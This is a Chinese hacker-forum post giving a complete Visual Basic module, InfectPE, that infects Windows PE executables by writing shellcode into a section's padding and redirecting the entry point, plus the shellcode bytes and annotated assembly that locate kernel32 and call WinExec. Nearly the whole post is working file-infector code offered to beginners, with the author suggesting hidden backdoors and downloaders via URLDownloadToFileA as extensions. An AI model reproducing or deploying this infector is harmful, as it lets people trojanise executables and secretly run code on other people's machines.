vb版感染PE的代码
作者:BlackFeather
出处:Lenk技术联盟 , 转载请注明出处
原来看过一份所谓的VB版感染文件的代码,其实就是把文件写到另一个文件的末尾,这是个毛感染啊 貌似网上VB版的感染也不多 我发出来一份
感染PE似乎是新手一个不敢涉足的东西,其实还是比较简单的,我偶尔看到了一个见缝插针的小程序,后来联想到了这个感染方式。
见缝插针的功能是把一个小后门(例如1KB以下的下载者等等)先写到目标程序的00区,然后继续在00去加一段代码调用kernel32._lwrite写文件和winexec执行,修改文件入口到这段代码,执行完毕后再跳回去。思路相当好,没有新加区段,PE文件大小也不变。但是缺点就是他调用kernel32的函数的时候用的是本机的函数内存地址,没有用搜索,所以只能在本机使用,换一个机子执行这个被感染的程序就根本不能执行。
这个方法感觉跟加花程序很像很像,我的想法就有了,找一段Shellcode(什么功能自己看着办),然后写到区段的00区,然后修改入口点到Shellcode ,执行完了再跳回原入口!Shellcode使用了寻址调用winexec函数,比上述的程序的通用性要高多了,下面这段代码中用的Shellcode是seer同学的,代码我也附上了。
为了新手的使用方便,我整理成了一个模块,调用函数InfectPE(要感染的文件,要运行的文件名)
注:因为Shellcode的原因,要运行的文件名不能大于12个字符 比如12345678.exe 不能再长了 代码执行成功的话返回值为1 ,并且在目标程序的目录下生成 目标文件名.exe的新程序,运行这个被感染的EXE就会运行当前目录下的12345678.exe了
感染PE的模块代码:
Attribute VB_Name = "ModInfectPE"
Option Explicit
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)
Private Type SectionHeader
Name As String * 8
RVA As Long
VirtualSize As Long
PhysicalSize As Long
Offset As Long
flags As Long
End Type
Private Const NeededArea As Long = 133
Dim PE() As Byte, e_lfanew As Long, NumberOfSections As Long, SizeOfOptionalHeader As Long, AddressOfEntryPoint As Long, NumberOfRvaAndSizes As Long
Dim EncStart As Long, EncEnd As Long, SectionTableOffset As Long, SectionTable() As SectionHeader, EntrySection As Long, PaddingArea As Long, tmp As Long
Dim PatchCode(NeededArea - 1) As Byte
Public Function InfectPE(ByVal strTargetFile As String, ByVal strRunFile As String) As Long
On Error GoTo ERR: '设置错误陷坑
'感染的Shellcode
PatchCode(0) = &H60
PatchCode(1) = &H55
PatchCode(2) = &H83
PatchCode(3) = &HEC
PatchCode(4) = &H40
PatchCode(5) = &H8B
PatchCode(6) = &HEC
PatchCode(7) = &H55
PatchCode(8) = &H64
PatchCode(9) = &HA1
PatchCode(10) = &H30
PatchCode(11) = &H0
PatchCode(12) = &H0
PatchCode(13) = &H0
PatchCode(14) = &H8B
PatchCode(15) = &H40
PatchCode(16) = &HC
PatchCode(17) = &H8B
PatchCode(18) = &H70
PatchCode(19) = &H1C
PatchCode(20) = &HAD
PatchCode(21) = &H8B
PatchCode(22) = &H78
PatchCode(23) = &H8
PatchCode(24) = &H8B
PatchCode(25) = &H47
PatchCode(26) = &H3C
PatchCode(27) = &H8B
PatchCode(28) = &H54
PatchCode(29) = &H7
PatchCode(30) = &H78
PatchCode(31) = &H3
PatchCode(32) = &HD7
PatchCode(33) = &H8B
PatchCode(34) = &H4A
PatchCode(35) = &H18
PatchCode(36) = &H8B
PatchCode(37) = &H5A
PatchCode(38) = &H20
PatchCode(39) = &H3
PatchCode(40) = &HDF
PatchCode(41) = &H49
PatchCode(42) = &H8B
PatchCode(43) = &H34
PatchCode(44) = &H8B
PatchCode(45) = &H3
PatchCode(46) = &HF7
PatchCode(47) = &HB8
PatchCode(48) = &H47
PatchCode(49) = &H65
PatchCode(50) = &H74
PatchCode(51) = &H50
PatchCode(52) = &H39
PatchCode(53) = &H6
PatchCode(54) = &H75
PatchCode(55) = &HF1
PatchCode(56) = &HB8
PatchCode(57) = &H72
PatchCode(58) = &H6F
PatchCode(59) = &H63
PatchCode(60) = &H41
PatchCode(61) = &H39
PatchCode(62) = &H46
PatchCode(63) = &H4
PatchCode(64) = &H75
PatchCode(65) = &HE7
PatchCode(66) = &H8B
PatchCode(67) = &H5A
PatchCode(68) = &H24
PatchCode(69) = &H3
PatchCode(70) = &HDF
PatchCode(71) = &H66
PatchCode(72) = &H8B
PatchCode(73) = &HC
PatchCode(74) = &H4B
PatchCode(75) = &H8B
PatchCode(76) = &H5A
PatchCode(77) = &H1C
PatchCode(78) = &H3
PatchCode(79) = &HDF
PatchCode(80) = &H8B
PatchCode(81) = &H4
PatchCode(82) = &H8B
PatchCode(83) = &H3
PatchCode(84) = &HC7
PatchCode(85) = &H89
PatchCode(86) = &H45
PatchCode(87) = &H40
PatchCode(88) = &H68
PatchCode(89) = &H78
PatchCode(90) = &H65
PatchCode(91) = &H63
PatchCode(92) = &H0
PatchCode(93) = &H68
PatchCode(94) = &H57
PatchCode(95) = &H69
PatchCode(96) = &H6E
PatchCode(97) = &H45
PatchCode(98) = &H54
PatchCode(99) = &H57
PatchCode(100) = &HFF
PatchCode(101) = &H55
PatchCode(102) = &H40
PatchCode(103) = &H89
PatchCode(104) = &H45
PatchCode(105) = &H8
PatchCode(106) = &H6A
PatchCode(107) = &H0
PatchCode(108) = &H68
PatchCode(109) = &H2E
PatchCode(110) = &H65
PatchCode(111) = &H78
PatchCode(112) = &H65
PatchCode(113) = &H68
PatchCode(114) = &H35
PatchCode(115) = &H36
PatchCode(116) = &H37
PatchCode(117) = &H38
PatchCode(118) = &H68
PatchCode(119) = &H31
PatchCode(120) = &H32
PatchCode(121) = &H33
PatchCode(122) = &H34
PatchCode(123) = &H54
PatchCode(124) = &HFF
PatchCode(125) = &H55
PatchCode(126) = &H8
PatchCode(127) = &H61
PatchCode(128) = &HE9
''''''''''''''''''''''''''''''''''''''''''''''调用winexec执行当前目录下某文件的Shellcode
Dim i As Long, p As Long, q As Long
If Len(strRunFile) > 12 Then MsgBox "要运行的文件的长度太长了,俺的Shellcode写不下···", , "MSGBOX": Exit Function
If Dir(strTargetFile) = "" Then MsgBox "目标文件貌似不存在吧···", , "MSGBOX": Exit Function
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''用最笨的方法修改Shellcode
PatchCode(119) = "&H" & Hex(Asc(Mid(strRunFile, 1, 1)))
PatchCode(120) = "&H" & Hex(Asc(Mid(strRunFile, 2, 1)))
PatchCode(121) = "&H" & Hex(Asc(Mid(strRunFile, 3, 1)))
PatchCode(122) = "&H" & Hex(Asc(Mid(strRunFile, 4, 1)))
strRunFile = Mid(strRunFile, 5, Len(strRunFile) - 4)
If Len(strRunFile) > 4 Then
For i = 1 To 4
PatchCode(113 + i) = "&H" & Hex(Asc(Mid(strRunFile, i, 1)))
Next
strRunFile = Mid(strRunFile, 5, Len(strRunFile) - 4)
Dim j As Integer
For j = 1 To Len(strRunFile)
PatchCode(108 + j) = "&H" & Hex(Asc(Mid(strRunFile, j, 1)))
Next
If Len(strRunFile) <> 4 Then PatchCode(110 + Len(strRunFile)) = &H0
ElseIf Len(strRunFile) = 4 Then
For i = 1 To 4
PatchCode(113 + i) = "&H" & Hex(Asc(Mid(strRunFile, i, 1)))
PatchCode(109) = &H0
Next
Else
For i = 1 To Len(strRunFile)
PatchCode(113 + i) = "&H" & Hex(Asc(Mid(strRunFile, i, 1)))
Next
PatchCode(114 + Len(strRunFile)) = &H0
End If
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''修改Shellcode完毕,累死我了调试了N次,光发晕
ReDim PE(FileLen(strTargetFile) - 1) '重定义PE的大小
Open strTargetFile For Binary As #1 '读取PE
Get #1, , PE
Close #1
e_lfanew = ReadDword(&H3C&)
NumberOfSections = ReadWord(e_lfanew + 6)
SizeOfOptionalHeader = ReadWord(e_lfanew + &H14&)
AddressOfEntryPoint = ReadWord(e_lfanew + &H28&) '原入口点
If SizeOfOptionalHeader >= &H60& Then
NumberOfRvaAndSizes = ReadDword(e_lfanew + &H74&)
Else
NumberOfRvaAndSizes = 0
End If
If NumberOfRvaAndSizes > 16 Then NumberOfRvaAndSizes = 16
If NumberOfRvaAndSizes > (SizeOfOptionalHeader - &H60&) \ 8 Then NumberOfRvaAndSizes = (SizeOfOptionalHeader - &H60&) \ 8
NumberOfRvaAndSizes = NumberOfRvaAndSizes - 1
EncStart = 0: EncEnd = &H7FFFFFFF
For i = 0 To NumberOfRvaAndSizes
p = ReadDword(e_lfanew + &H78& + i * 8)
q = p + ReadDword(e_lfanew + &H7C& + i * 8)
If p < 0 Or p > q Then
Exit Function
ElseIf p < AddressOfEntryPoint And q < AddressOfEntryPoint Then
If q >= EncStart Then EncStart = q + 1
ElseIf p > AddressOfEntryPoint And q > AddressOfEntryPoint Then
If p <= EncEnd Then EncEnd = p - 1
Else
Exit Function
End If
Next
NumberOfSections = NumberOfSections - 1
SectionTableOffset = e_lfanew + &H18& + SizeOfOptionalHeader
EntrySection = -1
ReDim SectionTable(NumberOfSections)
For i = 0 To NumberOfSections '开始分析区段
With SectionTable(i)
.Name = Read8Str(SectionTableOffset + i * &H28&)
.VirtualSize = ReadDword(SectionTableOffset + i * &H28& + &H8&)
.RVA = ReadDword(SectionTableOffset + i * &H28& + &HC&)
.PhysicalSize = ReadDword(SectionTableOffset + i * &H28& + &H10&)
.Offset = ReadDword(SectionTableOffset + i * &H28& + &H14&)
.flags = ReadDword(SectionTableOffset + i * &H28& + &H24&)
If EntrySection = -1 Then
If (AddressOfEntryPoint >= .RVA) And (AddressOfEntryPoint <= .RVA + .VirtualSize) Then EntrySection = i
End If
End With
Next
If EntrySection = -1 Then Exit Function
With SectionTable(EntrySection)
PaddingArea = .PhysicalSize - .VirtualSize
If PaddingArea < NeededArea Then
Exit Function
End If
For i = .Offset + .VirtualSize To .Offset + .PhysicalSize - 1
If PE(i) <> 0 Then
If MsgBox("Padding Area seems to have data, do you really want to continue?", vbQuestion Or vbYesNo) = vbYes Then
Exit For
Else
Exit Function
End If
End If
Next
If .RVA > EncStart Then EncStart = .RVA
If .RVA + .VirtualSize - 1 < EncEnd Then EncEnd = .RVA + .VirtualSize - 1
tmp = AddressOfEntryPoint - (.RVA + .VirtualSize + NeededArea)
CopyMemory PatchCode(129), tmp, 4
CopyMemory PE(.Offset + .VirtualSize), PatchCode(0), NeededArea
AddressOfEntryPoint = .RVA + .VirtualSize
WriteDword e_lfanew + &H28&, AddressOfEntryPoint
.VirtualSize = .VirtualSize + NeededArea
WriteDword SectionTableOffset + EntrySection * &H28& + &H8&, .VirtualSize
.flags = .flags Or &H80000000
WriteDword SectionTableOffset + EntrySection * &H28& + &H24&, .flags
End With
Open strTargetFile & ".exe" For Binary As #1 '生成新文件
Put #1, , PE
Close #1
InfectPE = 1
Exit Function
ERR:
InfectPE = 0
End Function
Private Function ReadWord(ByVal Offset As Long) As Long
CopyMemory ReadWord, PE(Offset), 2
End Function
Private Function ReadDword(ByVal Offset As Long) As Long
CopyMemory ReadDword, PE(Offset), 4
End Function
Private Sub WriteDword(ByVal Offset As Long, ByVal Data As Long)
CopyMemory PE(Offset), Data, 4
End Sub
Private Function Add0To8(ByVal InputStr As String) As String
Add0To8 = String(8 - Len(InputStr), "0") & InputStr
End Function
Private Function Read8Str(ByVal Offset As Long) As String
Dim i As Long, c As Byte, s As String
For i = 0 To 7
c = PE(Offset + i)
If c < 32 Or c > 127 Then c = 32
s = s & Chr(c)
Next
Read8Str = s
End Function
——————————————————————————————————————————————————-——
这个感染的功能很单调,可以写Shellcode,完成更多功能。比如调用fileexists函数查看文件是否存在,然后选择URLDOWNTOFILEA函数下载恢复等等···
Shellcode代码:
push ebp
sub esp, 0x40;
mov ebp, esp;
push ebp
mov eax, fs:0x30
mov eax, [eax+0x0c] ;Ldr
mov esi, [eax+0x1c] ;Flink
lodsd
mov edi, [eax+0x08] ;edi = kernel32.dll
mov eax, [edi+3Ch] ;eax = PE首部
mov edx, [edi+eax+78h]
add edx, edi ;edx = 输出表地址
mov ecx, [edx+18h] ;ecx = 输出函数个数
mov ebx, [edx+20h]
add ebx, edi ;ebx = 函数名地址
search:
dec ecx
mov esi, [ebx+ecx*4]
add esi, edi ;依次找每个函数名称
;GetProcAddress
mov eax, 0x50746547
cmp [esi], eax ;'PteG'
jne search
mov eax, 0x41636f72
cmp [esi+4], eax ;'Acor'
jne search
;如果是GetProcA,表示找到了
mov ebx, [edx+24h]
add ebx, edi ;ebx = 索引号地址
mov cx, [ebx+ecx*2] ;ecx = 计算出的索引号值
mov ebx, [edx+1Ch]
add ebx, edi ;ebx = 函数地址的起始位置
mov eax, [ebx+ecx*4]
add eax, edi ;用索引值,算GetProcAddress
mov [ebp+40h], eax ;GetProcAddress的地址=ebp+40
push dword ptr 0x00636578 ;//构造WinExec
push dword ptr 0x456e6957
push esp
push edi
call [ebp+40h] ;//执行GetProcAddress
mov [ebp+8h], eax ;//存入WinExec的地址 到[ebp+8h]
push 0
push dword ptr 0x6578652e
push dword ptr 0x38373635
push dword ptr 0x34333231 //12345678.exe
push esp
Call [ebp+8h] ;//调用winexec执行同一目录下的12345678.exe
————————————————————————————————————————————
大家玩好!
basic其实很强悍的,没有别人说的那么垃圾 垃圾的是VB 推荐使用powerbasic来编译 很牛的一个编译器
发出来一个示例: